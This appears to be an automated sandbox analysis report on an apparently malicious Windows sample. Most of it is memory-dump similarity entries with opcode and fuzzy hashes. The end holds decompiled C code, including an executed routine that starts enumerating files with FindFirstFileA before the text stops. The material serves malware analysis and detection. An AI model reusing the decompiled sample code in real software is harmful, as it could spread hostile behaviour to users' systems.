                                                                                                                          • Opcode ID: aaf06dcd04493231a994333bdbb583f18067e5a621c1db451df1a9ea33e93b37
                                                                                                                          • Instruction ID: 56aec64ee6048c4b09d0f08ba9dee6c8de9bc204f45a31c156c363cb1b049fb4
                                                                                                                          • Opcode Fuzzy Hash: aaf06dcd04493231a994333bdbb583f18067e5a621c1db451df1a9ea33e93b37
                                                                                                                          • Instruction Fuzzy Hash: 8DF0E2329256A88FD771C71CD244F23B7D5AB017B8F454474E40587922CB38EC80C680
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f385a31d2a538a1789ab88d8349b419faff25490f6616fea770dc823ef211bf8
                                                                                                                          • Instruction ID: d2629b1ba95cecfe1252d6f4ffeaa0395eb3297bc72e2d8eff5dabdd81c807b7
                                                                                                                          • Opcode Fuzzy Hash: f385a31d2a538a1789ab88d8349b419faff25490f6616fea770dc823ef211bf8
                                                                                                                          • Instruction Fuzzy Hash: C7E022B2A01420ABC2228B0ABC00F66739DDBD8B40F090034F608C7260C668DD02C7E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                          • Instruction ID: 09988794c57e0ae3acee68de39bc9bef8598f98d1791fc6595693de7da262370
                                                                                                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                          • Instruction Fuzzy Hash: DEE0D832A4015CBBCB21A6D99D16FAABBADDB88FA0F000166B904DB190D5609D00C2D1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4adcc8f14e49e13e40a7ebe774366f7afcce6ee0c91a3ac16921c08c24e69c2d
                                                                                                                          • Instruction ID: a18105dd94ea1c63391073cfc4d09faab08764b2a395ce9cee97919c2e7a6d67
                                                                                                                          • Opcode Fuzzy Hash: 4adcc8f14e49e13e40a7ebe774366f7afcce6ee0c91a3ac16921c08c24e69c2d
                                                                                                                          • Instruction Fuzzy Hash: CCE0DFB06492449FDB34DF5AD162F2D379C9B92729F19C42FF00A4B202C625DC80C256
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 00c9e3ada32ed730fe4e15f8ca1710452195921eda04bef46f65e69fecad79cc
                                                                                                                          • Instruction ID: 5eff9d1bd24595bae143c308a7c6f822d82e0aadba8148b2bba2f250ceb9814c
                                                                                                                          • Opcode Fuzzy Hash: 00c9e3ada32ed730fe4e15f8ca1710452195921eda04bef46f65e69fecad79cc
                                                                                                                          • Instruction Fuzzy Hash: 48F01C74852700DECB60EFAC990579836ACF74831AF204266A000876B6CF3844C6CF01
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                          • Instruction ID: cb5cb83b355298f055f9847f8987b6b5203612812f28a8049493a63b54307237
                                                                                                                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                          • Instruction Fuzzy Hash: 9FE0C231284244BBDB225E44CC01F69BB26EF907A1F208035FE085E691C6759C91E6C5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d2cf8234a8993bff3cec3703db166e9f332f71a1095bfd6bf93e4d81da143788
                                                                                                                          • Instruction ID: 2670f80aaf38767ee1d1d81bedda89ae900a36064e1e8a35a2d4eacdb6bf52d1
                                                                                                                          • Opcode Fuzzy Hash: d2cf8234a8993bff3cec3703db166e9f332f71a1095bfd6bf93e4d81da143788
                                                                                                                          • Instruction Fuzzy Hash: 8AD02EA22280441ADB2E63819C24B31221AE7C4710F31082CF20B0A9A2DEA88CD0C70A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: caa381e89127efdeb31b6d5e8d813cb29a91c4ebb985ec4221b72c8410079b4a
                                                                                                                          • Instruction ID: e5ab2f7208be37ebb6babb2349da493246b82703f7da827672b8567ade0acdfe
                                                                                                                          • Opcode Fuzzy Hash: caa381e89127efdeb31b6d5e8d813cb29a91c4ebb985ec4221b72c8410079b4a
                                                                                                                          • Instruction Fuzzy Hash: 49D0A931210240E2DE2E6B119805B24225AEBC0B85F38006CF30B998C2DFA5DCA2E28C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                          • Instruction ID: 7e3046ffa49703fb0d8875b7d3449c26636f62a88e9179d40d73d82089ec2ffe
                                                                                                                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                          • Instruction Fuzzy Hash: 77E0EC76944B849BCF16EF9AC660F5EB7F5FB84B40F150455B4085F662C665AD00CB40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                          • Instruction ID: 4be9a797cb8359f104903a11da218572fbe78c5df4c027492c46407f9253ab41
                                                                                                                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                          • Instruction Fuzzy Hash: AAD0C939352980CFD616CB0CC554B0533A8BB04B40FC505A0E400CB761E62CDD40CA00
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                          • Instruction ID: 3c9400bf187536754dda3df4a049deaeea1650b0b54e0c4e93d12459f63bf3a2
                                                                                                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                          • Instruction Fuzzy Hash: D0D0A9314412889ADF01BB10C21877C33B6BB80308F68A066B24A0A962C33E4F0AD700
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                          • Instruction ID: af7b36a5c0961106636787008f5c8df25109c5849bc00da1443cb35e0eb52542
                                                                                                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                          • Instruction Fuzzy Hash: 56C08C30281A40AAEB221F20CD02F0036A4BB41F01F4500A07300DA0F0EB78DC01E600
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                          • Instruction ID: f3d28c88e77762c534a60fb7daf77ffa6e5f32b2c11f34ccf9da2c10b9bf40c5
                                                                                                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                          • Instruction Fuzzy Hash: F8C01232080288BBCB126E82CC01F167B2AEB94B60F008014BA080A5618A32E970EA84
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                          • Instruction ID: 2cc4dd702173a64be2559d3491d0c994ba9ca9649904782773c71490b98539bf
                                                                                                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                          • Instruction Fuzzy Hash: 36C04C32180688BBCB126E46DD01F157B69E795B60F154021B6040A5618576ED61D59C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                          • Instruction ID: 1e9115a6aab12f413205b2cf3d5a85f376ccfd120dbab8b09723a59ee999cbb8
                                                                                                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                          • Instruction Fuzzy Hash: 2CC08C32080288BBC7126A86DD01F01BB29E790B60F000020B6040A6628932EC60D588
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                          • Instruction ID: ccb40e0fcad77475a57f1f203fcf2401e8cdcec5593b06c8176cfdbf894b0937
                                                                                                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                          • Instruction Fuzzy Hash: 21C02B70150480BBDB162F30CD02F247258F740F21F6403547320854F0D52C9C00D208
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                          • Instruction ID: e247c90ebae2dad5e92510222d483316103bec3288d1368518a102bb7fa3f05c
                                                                                                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                          • Instruction Fuzzy Hash: DDC08C701899C05AEB2A5788CE21B20F658BB08708F88099CBA01096A2E369EC02C209
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                          • Instruction ID: d3d3e37365286a6f3165ec2f5f4aa05cbf89bc5bbba71d535e63d33a270b1b64
                                                                                                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                          • Instruction Fuzzy Hash: 60B09234301981CFCE16DF19C480B1573E8BB44B40B8400D0E400CBA20D229EC408900
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                          • Instruction ID: 9f81abd72d1d39278f7e3446ae5917a7aefaefbaa712c5c9b2542fe40585b32b
                                                                                                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                          • Instruction Fuzzy Hash: 58B01232C50540CFCF02FF40C610B197331FB40750F058492A0012BA31C22CBC01CB40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7f57d8ec620b5477713a7041f4138c1f89f7de3b5949056ddd3d970e0af6c7e0
                                                                                                                          • Instruction ID: a8cf857df87f6bd03865a0eb8afb916004f5972a04dd5b3f14e8d12fa6ce18cf
                                                                                                                          • Opcode Fuzzy Hash: 7f57d8ec620b5477713a7041f4138c1f89f7de3b5949056ddd3d970e0af6c7e0
                                                                                                                          • Instruction Fuzzy Hash: 4F90026130101402D202616944146460409D7D1385F91C422E1414555D86658993F1B2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a95b55083c9078d4c0148a203ff530e1d0fd8da1bf08b7b1e37988ad21b478e8
                                                                                                                          • Instruction ID: 0b268831c4c1ab52680674bb3939a4bb22d2de30e32814bef46280208555ae7a
                                                                                                                          • Opcode Fuzzy Hash: a95b55083c9078d4c0148a203ff530e1d0fd8da1bf08b7b1e37988ad21b478e8
                                                                                                                          • Instruction Fuzzy Hash: C890027124101402D241716944046460409A7D0381F91C422A0414554E86958A96FAE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: acf0c5ca6763ce112214fdba1750dead8e58c65212ac86bb2dd03a9595d1ad0d
                                                                                                                          • Instruction ID: acf0d5f479c79240ac9ac3f0f0c07aefe48256605cffbc211af4fdd1922508f2
                                                                                                                          • Opcode Fuzzy Hash: acf0c5ca6763ce112214fdba1750dead8e58c65212ac86bb2dd03a9595d1ad0d
                                                                                                                          • Instruction Fuzzy Hash: 119002A1601150434640B16948044465415A7E1341391C531A0444560C86A88895E2E5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3e3134b4b9b74d5b5f2d45300f61748f4729402a362236be3a1df73dcaafaede
                                                                                                                          • Instruction ID: a40fc812ad20c0d0bfccf7cd46ae6051b02e7a62ad9cbeb0bb490aa243aa8551
                                                                                                                          • Opcode Fuzzy Hash: 3e3134b4b9b74d5b5f2d45300f61748f4729402a362236be3a1df73dcaafaede
                                                                                                                          • Instruction Fuzzy Hash: 9C9002A121101042D20461694404746044597E1341F51C422A2144554CC5698CA1A1A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0ec523b322f154841782fe45702d7bb620cdbbf48eac7ed7b0442deeea57f1d9
                                                                                                                          • Instruction ID: 9d87ebb25f7e16c674cf0bdcc66ad79c6c983cba86160841acaefd05b65c1d6a
                                                                                                                          • Opcode Fuzzy Hash: 0ec523b322f154841782fe45702d7bb620cdbbf48eac7ed7b0442deeea57f1d9
                                                                                                                          • Instruction Fuzzy Hash: 329002A120141403D24065694804647040597D0342F51C421A2054555E8A698C91B1B5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8c1a2e58d0a9ee9d905b37cec31034e9a00ab54e61687ecd0b08b9711e7ad384
                                                                                                                          • Instruction ID: f4c5860114ddf17f9db68ecdf7c04f689360a1830384660e23aad6d85af66e4b
                                                                                                                          • Opcode Fuzzy Hash: 8c1a2e58d0a9ee9d905b37cec31034e9a00ab54e61687ecd0b08b9711e7ad384
                                                                                                                          • Instruction Fuzzy Hash: 1F90026120145442D24062694804B4F450597E1342F91C429A4146554CC9558895A7A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5b50242622c097c1ee3ab1105051543370df660245f824523dd5cfe0eca8c0e2
                                                                                                                          • Instruction ID: f212c6223a443c7e31d175cbe2b1ac146a28fab09b18ce3e74788c09f461f788
                                                                                                                          • Opcode Fuzzy Hash: 5b50242622c097c1ee3ab1105051543370df660245f824523dd5cfe0eca8c0e2
                                                                                                                          • Instruction Fuzzy Hash: 4590027120141402D20061694808787040597D0342F51C421A5154555E86A5C8D1B5B1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7e7bf762dbf6bb3b163a6c58d365a8d85a166491c1605bf008595114bc300184
                                                                                                                          • Instruction ID: 35a2c4a2356be97c713b9b11c77802ac3579c4f72cf500f85071e0fb5cbe680b
                                                                                                                          • Opcode Fuzzy Hash: 7e7bf762dbf6bb3b163a6c58d365a8d85a166491c1605bf008595114bc300184
                                                                                                                          • Instruction Fuzzy Hash: 1990027120145002D2407169844464B5405A7E0341F51C821E0415554C86558896E2A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 03e685d4f64a78ebac497f8df8d3f8371ac3c3f2269777c46a2b0d514afb49dd
                                                                                                                          • Instruction ID: d2fedbcecf7a950f5374f74c095b12ae17afb836810d99b7043c15328ee36e23
                                                                                                                          • Opcode Fuzzy Hash: 03e685d4f64a78ebac497f8df8d3f8371ac3c3f2269777c46a2b0d514afb49dd
                                                                                                                          • Instruction Fuzzy Hash: FB90026124101802D240716984147470406D7D0741F51C421A0014554D865689A5B6F1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true

                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E00A5FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                          				void* _t7;
                                                                                                                          				intOrPtr _t9;
                                                                                                                          				intOrPtr _t10;
                                                                                                                          				intOrPtr* _t12;
                                                                                                                          				intOrPtr* _t13;
                                                                                                                          				intOrPtr _t14;
                                                                                                                          				intOrPtr* _t15;
                                                                                                                          
                                                                                                                          				_t13 = __edx;
                                                                                                                          				_push(_a4);
                                                                                                                          				_t14 =  *[fs:0x18];
                                                                                                                          				_t15 = _t12;
                                                                                                                          				_t7 = E00A0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                          				_push(_t13);
                                                                                                                          				E00A55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                          				_t9 =  *_t15;
                                                                                                                          				if(_t9 == 0xffffffff) {
                                                                                                                          					_t10 = 0;
                                                                                                                          				} else {
                                                                                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                          				}
                                                                                                                          				_push(_t10);
                                                                                                                          				_push(_t15);
                                                                                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                          				return E00A55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A5FDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A5FE2B
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A5FE01
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: 05f2b1fcdb6c4e0f3fb10e9f6ecfb3c497451875d7a5507d71965bc8a1d38da1
                                                                                                                          • Instruction ID: 96e45386d4b3a81d1b37ac4873e997ea375468bc9e47f36266e5cb260fc2406d
                                                                                                                          • Opcode Fuzzy Hash: 05f2b1fcdb6c4e0f3fb10e9f6ecfb3c497451875d7a5507d71965bc8a1d38da1
                                                                                                                          • Instruction Fuzzy Hash: 8DF0F632600601BFDA201B55DD03F63BF6AEB84731F240314FA28565E1DA72F86096F0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          C-Code - Quality: 61%
                                                                                                                          			E00405634(void* __eax, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                          				char _v292;
                                                                                                                          				char _v336;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __ebp;
                                                                                                                          				CHAR* _t38;
                                                                                                                          				void* _t39;
                                                                                                                          				void* _t44;
                                                                                                                          				int _t45;
                                                                                                                          				intOrPtr _t56;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				void* _t58;
                                                                                                                          				void* _t60;
                                                                                                                          				void* _t63;
                                                                                                                          				void* _t69;
                                                                                                                          				void* _t70;
                                                                                                                          				void* _t80;
                                                                                                                          				void* _t82;
                                                                                                                          				void* _t83;
                                                                                                                          				void* _t84;
                                                                                                                          				void* _t85;
                                                                                                                          				void* _t86;
                                                                                                                          				struct _WIN32_FIND_DATAA* _t87;
                                                                                                                          
                                                                                                                          				_t85 = __esi;
                                                                                                                          				_t70 = __edx;
                                                                                                                          				_t61 = __ecx;
                                                                                                                          				_t60 = __eax;
                                                                                                                          				asm("pushad");
                                                                                                                          				E004052D8(__eax);
                                                                                                                          				 *((intOrPtr*)(_t60 + 0x18)) = E0040456C();
                                                                                                                          				asm("popad");
                                                                                                                          				asm("pushad");
                                                                                                                          				_t2 = _t60 + 0x1c; // 0x1c
                                                                                                                          				E004030E8(_t2, _t70);
                                                                                                                          				asm("popad");
                                                                                                                          				if( *((intOrPtr*)(_t60 + 0x1c)) != 0) {
                                                                                                                          					asm("pushad");
                                                                                                                          					_t4 = _t60 + 0x1c; // 0x1c
                                                                                                                          					E00404DB8( *_t4, _t4);
                                                                                                                          					_t32 =  *((intOrPtr*)(_t60 + 0x20));
                                                                                                                          					if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
                                                                                                                          						_t56 = E00405C80();
                                                                                                                          						 *((intOrPtr*)(_t60 + 0x20)) = _t56;
                                                                                                                          						asm("popad");
                                                                                                                          						asm("pushad");
                                                                                                                          						_t57 = _t61;
                                                                                                                          						_t61 = _t56;
                                                                                                                          						_t58 = E004048D8(_t57, _t56, 0x40569b);
                                                                                                                          						_t82 = _t61;
                                                                                                                          						if(_t58 == 0) {
                                                                                                                          							_t82 = E004056A7;
                                                                                                                          						}
                                                                                                                          						_t32 = E00405CAC( *((intOrPtr*)(_t60 + 0x20)), _t82);
                                                                                                                          					}
                                                                                                                          					asm("popad");
                                                                                                                          					_t87 = _t86 + 0xfffffec0;
                                                                                                                          					_push(0);
                                                                                                                          					_push(0);
                                                                                                                          					E00405300(_t61, _t60, _t32, _t87, _t83, _t85);
                                                                                                                          					_pop(_t63);
                                                                                                                          					E00403258( &_v336, _t63,  *((intOrPtr*)(_t60 + 0x1c)));
                                                                                                                          					E004044A8();
                                                                                                                          					_t38 = _t63;
                                                                                                                          					_push(_t38);
                                                                                                                          					_t39 = FindFirstFileA(_t38, _t87); // executed
                                                                                                                          					_t84 = _t39;
                                                                                                                          					asm("pushfd");
